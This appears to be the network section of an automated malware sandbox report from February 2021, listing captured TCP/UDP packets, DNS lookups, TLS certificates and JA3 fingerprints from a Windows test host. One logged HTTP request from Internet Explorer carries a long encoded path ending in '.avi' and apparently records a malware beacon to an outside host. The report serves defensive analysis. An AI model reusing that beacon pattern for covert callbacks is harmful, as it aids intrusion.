                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.005781889 CET49763443192.168.2.4104.20.185.68
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.005861998 CET49764443192.168.2.4104.20.185.68
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.048928022 CET44349770151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.048959970 CET44349771151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.048969030 CET44349770151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.048985958 CET44349771151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.048995018 CET44349768151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049010038 CET44349768151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049021959 CET44349769151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049037933 CET44349769151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049101114 CET44349772151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049122095 CET44349772151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049134970 CET49770443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049175024 CET49771443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049191952 CET49770443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049199104 CET49771443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049235106 CET49768443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049326897 CET49768443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049382925 CET49769443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049444914 CET49769443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049494028 CET49772443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.049520969 CET49772443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.050134897 CET44349767151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.050152063 CET44349767151.101.1.44192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.050240040 CET49767443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.050314903 CET49767443192.168.2.4151.101.1.44
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.052611113 CET44349764104.20.185.68192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.052696943 CET49764443192.168.2.4104.20.185.68
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.052788019 CET44349763104.20.185.68192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:49.052871943 CET49763443192.168.2.4104.20.185.68

                                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:52.813853979 CET4991053192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:52.865179062 CET53499108.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:53.768256903 CET5585453192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:53.820095062 CET53558548.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:54.895735025 CET6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:54.947385073 CET53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:56.348741055 CET6315353192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:56.405731916 CET53631538.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:57.522456884 CET5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:57.571600914 CET53529918.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:58.182564020 CET5370053192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:58.246678114 CET53537008.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:58.517858028 CET5172653192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:58.578073978 CET53517268.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.161664009 CET5679453192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.219110966 CET53567948.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.411058903 CET5653453192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.459939957 CET53565348.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.877295017 CET5662753192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.886950970 CET5662153192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.929183960 CET53566278.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.945417881 CET53566218.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:00.235522985 CET6311653192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:00.284308910 CET53631168.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.611608028 CET6407853192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.682307959 CET53640788.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.710906982 CET6480153192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.759725094 CET53648018.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.877788067 CET6172153192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.949915886 CET53617218.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:02.543351889 CET5125553192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:02.613531113 CET53512558.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:02.883302927 CET6152253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:02.936345100 CET53615228.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.074212074 CET5233753192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.141350031 CET53523378.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.500111103 CET5504653192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.558917046 CET53550468.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.682466030 CET4961253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.731393099 CET53496128.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.798084974 CET4928553192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.846616030 CET53492858.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:04.778845072 CET5060153192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:04.836524010 CET53506018.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:06.265953064 CET6087553192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:06.323729038 CET53608758.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:07.288892031 CET5644853192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:07.337691069 CET53564488.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:11.562342882 CET5917253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:11.611310005 CET53591728.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:13.146342993 CET6242053192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:13.203633070 CET53624208.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:15.510276079 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:15.559256077 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:16.537668943 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:16.561140060 CET6153153192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:16.587007999 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:16.610327959 CET53615318.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:17.515517950 CET4922853192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:17.566530943 CET53492288.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:21.474693060 CET5979453192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:21.532968044 CET53597948.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:23.190774918 CET5591653192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:23.263197899 CET53559168.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:28.139267921 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:28.203318119 CET53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:28.965183020 CET6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:29.035183907 CET53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:29.153306961 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:29.204880953 CET53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:29.981064081 CET6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:30.050852060 CET53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:30.256158113 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:30.316346884 CET53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:31.000231028 CET6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:31.048908949 CET53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:32.252814054 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:32.314445019 CET53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:33.002341032 CET6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:33.061996937 CET53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:36.262620926 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:36.322523117 CET53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:36.798854113 CET6068953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:36.857542992 CET53606898.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:37.011910915 CET6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:37.062449932 CET53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:37.468275070 CET6420653192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:37.506395102 CET5090453192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:37.528587103 CET53642068.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:37.563957930 CET53509048.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:37.733607054 CET5752553192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:37.807235003 CET53575258.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:38.126596928 CET5381453192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:38.178384066 CET53538148.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:38.666368961 CET5341853192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:38.738888025 CET53534188.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:39.292385101 CET6283353192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:39.344167948 CET53628338.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:40.001787901 CET5926053192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:40.062717915 CET53592608.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:41.119447947 CET4994453192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:41.178226948 CET53499448.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:41.437294006 CET6330053192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:41.488898993 CET53633008.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:42.126233101 CET6144953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:42.183365107 CET53614498.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:43.158730984 CET5127553192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:43.215976954 CET53512758.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:44.089356899 CET6349253192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:44.146420002 CET53634928.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:51.741687059 CET5894553192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:51.790473938 CET53589458.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:51.858728886 CET6077953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:51.930464029 CET53607798.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:54.556945086 CET6401453192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:54.615498066 CET53640148.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:00.103555918 CET5709153192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:00.164751053 CET53570918.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:28.065774918 CET5590453192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:28.114415884 CET53559048.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:29.749552965 CET5210953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:29.801068068 CET53521098.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:30.021754026 CET5445053192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:30.081919909 CET53544508.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:30.743726015 CET5210953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:30.803917885 CET53521098.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:31.750775099 CET5210953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:31.802397966 CET53521098.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:33.766541004 CET5210953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:33.826400995 CET53521098.8.8.8192.168.2.4
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:37.771157980 CET5210953192.168.2.48.8.8.8
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:37.831059933 CET53521098.8.8.8192.168.2.4

                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.411058903 CET192.168.2.48.8.8.80xa1a9Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.611608028 CET192.168.2.48.8.8.80x8777Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.877788067 CET192.168.2.48.8.8.80x85a4Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:02.543351889 CET192.168.2.48.8.8.80xe0c4Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.074212074 CET192.168.2.48.8.8.80xb553Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.500111103 CET192.168.2.48.8.8.80x6961Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.682466030 CET192.168.2.48.8.8.80x2400Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.798084974 CET192.168.2.48.8.8.80x7878Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:04.778845072 CET192.168.2.48.8.8.80x663bStandard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:00.103555918 CET192.168.2.48.8.8.80x6fe6Standard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                                          Feb 10, 2021 07:59:59.459939957 CET8.8.8.8192.168.2.40xa1a9No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.682307959 CET8.8.8.8192.168.2.40x8777No error (0)contextual.media.net184.30.24.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:01.949915886 CET8.8.8.8192.168.2.40x85a4No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:02.613531113 CET8.8.8.8192.168.2.40xe0c4No error (0)lg3.media.net184.30.24.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.141350031 CET8.8.8.8192.168.2.40xb553No error (0)hblg.media.net184.30.24.22A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.558917046 CET8.8.8.8192.168.2.40x6961No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.731393099 CET8.8.8.8192.168.2.40x2400No error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.731393099 CET8.8.8.8192.168.2.40x2400No error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.846616030 CET8.8.8.8192.168.2.40x7878No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.846616030 CET8.8.8.8192.168.2.40x7878No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:04.836524010 CET8.8.8.8192.168.2.40x663bNo error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:04.836524010 CET8.8.8.8192.168.2.40x663bNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:04.836524010 CET8.8.8.8192.168.2.40x663bNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:04.836524010 CET8.8.8.8192.168.2.40x663bNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:04.836524010 CET8.8.8.8192.168.2.40x663bNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:00.164751053 CET8.8.8.8192.168.2.40x6fe6No error (0)ocsp.sca1b.amazontrust.com143.204.15.36A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:00.164751053 CET8.8.8.8192.168.2.40x6fe6No error (0)ocsp.sca1b.amazontrust.com143.204.15.47A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:00.164751053 CET8.8.8.8192.168.2.40x6fe6No error (0)ocsp.sca1b.amazontrust.com143.204.15.29A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:00.164751053 CET8.8.8.8192.168.2.40x6fe6No error (0)ocsp.sca1b.amazontrust.com143.204.15.203A (IP address)IN (0x0001)

                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                          • ocsp.sca1b.amazontrust.com

                                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                          0192.168.2.449807143.204.15.3680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:00.240350962 CET7072OUTGET /images/6dayin3l_2BW7S5N/Gnz0LZyN5g7qBCp/B248LI31NTm818fYOn/fysFBCtAX/mFx67NJKGVDz3pFMjIdO/XoUT0M9jZwrwMgD0uAp/CgYK6Ygv23owJGncqjZFiC/pOwFjCE84YiD0/1phiKHMB/f6QyQEHF3TG2tTdcJHXtR52/qEFsUyav_2/BP9zanZDbdL9eB1Zb/YFBtE8bSAfxP/4sQIJiENwsY/qwZf6.avi HTTP/1.1
                                                                                                                                                                                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Feb 10, 2021 08:01:00.552654028 CET7072INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Content-Type: application/ocsp-response
                                                                                                                                                                                                                                                          Content-Length: 5
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Cache-Control: public, max-age=300
                                                                                                                                                                                                                                                          Date: Wed, 10 Feb 2021 07:01:00 GMT
                                                                                                                                                                                                                                                          ETag: "5f4e9b00-5"
                                                                                                                                                                                                                                                          Last-Modified: Tue, 01 Sep 2020 19:03:28 GMT
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                          Via: 1.1 ab6f11597d22bd0292d6b657e4418dd2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: MXP64-C1
                                                                                                                                                                                                                                                          X-Amz-Cf-Id: spCVPGTepeaiucK59DnidPQ8V2elZIq74BRZT0KSMlzLyRCqTfwW2w==
                                                                                                                                                                                                                                                          Data Raw: 30 03 0a 01 06
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          HTTPS Packets

                                                                                                                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.836044073 CET104.20.185.68443192.168.2.449764CN=*.onetrust.com, O=OneTrust LLC, L=Sandy Springs, ST=Georgia, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu May 21 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Wed Jul 27 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                          CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:03.841238022 CET104.20.185.68443192.168.2.449763CN=*.onetrust.com, O=OneTrust LLC, L=Sandy Springs, ST=Georgia, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu May 21 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Wed Jul 27 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                          CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:05.058921099 CET151.101.1.44443192.168.2.449767CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                          CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
